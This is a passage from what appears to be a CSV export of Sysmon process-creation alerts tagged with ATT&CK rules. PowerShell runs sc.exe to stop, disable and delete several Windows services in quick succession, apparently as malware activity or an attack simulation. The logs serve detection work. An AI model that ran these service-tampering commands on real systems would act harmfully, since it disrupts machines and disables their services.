WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.208607500Z"",""eventRecordID"":""2367"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.204\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-00108cfa1d00}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.204"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-00108cfa1d00}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.341",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:01.188 +ProcessGuid: {df9fc3d3-b379-5ecf-0000-0010abf91d00} +ProcessId: 5948 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:01.191353300Z"",""eventRecordID"":""2366"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:01.188\r\nProcessGuid: {df9fc3d3-b379-5ecf-0000-0010abf91d00}\r\nProcessId: 5948\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:01.188"",""processGuid"":""{df9fc3d3-b379-5ecf-0000-0010abf91d00}"",""processId"":""5948"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.291",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.984 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001015f61d00} +ProcessId: 2112 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.987161000Z"",""eventRecordID"":""2363"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.984\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001015f61d00}\r\nProcessId: 2112\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SxS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.984"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001015f61d00}"",""processId"":""2112"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SxS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.243",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.922 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00104af31d00} +ProcessId: 3440 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""Sncryption Media Playeq"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.924235700Z"",""eventRecordID"":""2360"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.922\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00104af31d00}\r\nProcessId: 3440\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""Sncryption Media Playeq\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.922"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00104af31d00}"",""processId"":""3440"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""Sncryption Media Playeq\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.229",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.905 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-00105ff21d00} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config ""Sncryption Media Playeq"" Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.907766800Z"",""eventRecordID"":""2359"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.905\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-00105ff21d00}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config \""Sncryption Media Playeq\"" Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.905"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-00105ff21d00}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Sncryption Media Playeq\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.197",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.869 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-001095f01d00} +ProcessId: 6716 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""NetMsmqActiv Media NVIDIA"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.871889100Z"",""eventRecordID"":""2357"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.869\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-001095f01d00}\r\nProcessId: 6716\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""NetMsmqActiv Media NVIDIA\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:00.869"",""processGuid"":""{df9fc3d3-b378-5ecf-0000-001095f01d00}"",""processId"":""6716"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""NetMsmqActiv Media NVIDIA\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:29.154",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:00.806 +ProcessGuid: {df9fc3d3-b378-5ecf-0000-0010faed1d00} +ProcessId: 7788 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop RpcEptManger +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop RpcEptManger",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:00.808880600Z"",""eventRecordID"":""2354"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:00.806\r\nProcessGuid: {df9fc3d3-b378-5ecf-0000-0010faed1d00}\r\nProcessId: 7788\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 